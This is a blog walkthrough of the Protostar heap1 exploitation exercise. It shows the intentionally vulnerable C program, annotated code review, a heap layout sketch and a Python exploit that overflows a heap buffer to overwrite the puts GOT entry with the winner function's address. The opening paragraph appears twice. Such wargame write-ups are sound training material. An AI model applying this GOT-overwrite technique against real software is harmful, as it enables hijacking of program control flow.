Hello Guyz,
Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap1 Level.
In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.
Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Heap1 Level.
In This Level, Our Task Is to Execute Winner Function Through Heap Overflow Concept.
Before Starting Our Walkthrough Let's Take a Look At Hints And Details.
Note: I want to highlight Few Points.
- I'm not the creator of protostar war game. I am just a player.
- Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
- Understand all previous levels before starting this one.
- Do some research on Assembly, C/C++ and Gdb
- Do Some Research About Heap overflow exploitation.
Source Code
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
struct internet {
int priority;
char *name;
};
void winner()
{
printf("and we have a winner @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
struct internet *i1, *i2, *i3;
i1 = malloc(sizeof(struct internet));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct internet));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
printf("and that's a wrap folks!\n");
}
Hint
This level takes a look at code flow hijacking in data overwrite cases.
This level is at /opt/protostar/bin/heap1
Code Review
struct internet {
int priority;
char *name; <--- Noticiable Things is that, its a pointer.. means its take only 4 bytes to point to another location
};
void winner()
{
printf("and we have a winner @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
struct internet *i1, *i2, *i3; <--- Create Three Pointers To Struct Internet
i1 = malloc(sizeof(struct internet)); <--- Locating Space for First Struct Internet Pointers
i1->priority = 1; <--- Insert Digit
i1->name = malloc(8); <--- Locate Another Location For Char Pointer
i2 = malloc(sizeof(struct internet)); <--- Locating Space For Second Struct Internet Pointer
i2->priority = 2; <--- Insert Digit
i2->name = malloc(8); <--- Locate Another Location For Char Pointer
strcpy(i1->name, argv[1]); <--- Copy String To i1
strcpy(i2->name, argv[2]); <--- Copy String To i2
printf("and that's a wrap folks!\n");
}
Planning
Heap Overview
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
-----------------------------------------------------------------------------------------------------------
| i1 ( Name, Char Pointer ) | Paddings and Other Stuff | i2 ( Name, Char Pointer ) | Name (8) | Name (8) |
------------------------------------------------------------------------------------------------------------
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
We Just Need To Overwrite Char Pointer of i2 So, that during copying data from argument, strcpy will copy data to name location and to do it, strcpy will access the pointer of char name. and (because of us) strcpy will overwrite GOT table with argv[2]
Overflow Name And Write Data To FP
Exploit
import struct
buf = "\x90"*4*5
# Address Of Put wrapper inot global table
puts_glob = 0x08049774
# Need To Overwrite put with
win = 0x08048494
ret = struct.pack("I",win)
payload = ''
payload+= buf
payload+= struct.pack("I", puts_glob)
payload+= " "
payload+= struct.pack("I",win)
print payload